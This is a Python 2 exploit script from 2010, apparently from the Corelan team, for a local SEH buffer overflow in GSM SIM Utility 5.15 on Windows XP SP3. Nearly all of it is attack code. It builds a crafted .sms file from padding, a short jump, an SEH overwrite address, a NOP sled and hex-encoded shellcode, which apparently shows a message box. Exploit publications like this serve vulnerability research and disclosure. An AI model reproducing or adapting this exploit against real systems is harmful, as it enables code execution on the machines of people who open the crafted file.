# Exploit Title : GSM SIM Utility sms file Local SEH BoF
# Date : June 28, 2010
# Author : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version : 5.15
# OS : Windows XP SP3
# Type of vuln : SEH
# Greetz to : Corelan Security Team * Special Greetz to Lincoln
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code:
import time
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] GSM SIM Utility SEH Local Exploit\n"
sc =("d9eb9bd97424f431d2b27a31c964"
"8b71308b760c8b761c8b46088b7e"
"208b36384f1875f35901d1ffe160"
"8b6c24248b453c8b54057801ea8b"
"4a188b5a2001ebe337498b348b01"
"ee31ff31c0fcac84c0740ac1cf0d"
"01c7e9f1ffffff3b7c242875de8b"
"5a2401eb668b0c4b8b5a1c01eb8b"
"048b01e88944241c61c3b20829d4"
"89e589c2688e4e0eec52e89cffff"
"ff894504bb7ed8e273871c2452e8"
"8bffffff894508686c6c20ff6833"
"322e646875736572885c240a89e6"
"56ff550489c250bba8a24dbc871c"
"2452e85effffff68703058206820"
"6368616864204279686f69746568"
"4578706c31db885c241289e3686b"
"58202068426c6163687468652068"
"75676820685468726f31c9884c24"
"1189e131d252535152ffd031c050"
"ff5508")
buf= "A" * 1834
buf+= "eb069090"
buf+= "F25E4300"
buf+= "90" * 20
buf+= sc
try:
crash = open("hacked.sms",'w')
crash.write(buf)
crash.close()
print "[+] Visit www.corelan.be port 8800!\n"
except:
print "Error occured, look at the code!\n"
time.sleep(2)
print "[+] Exploit file created!\n"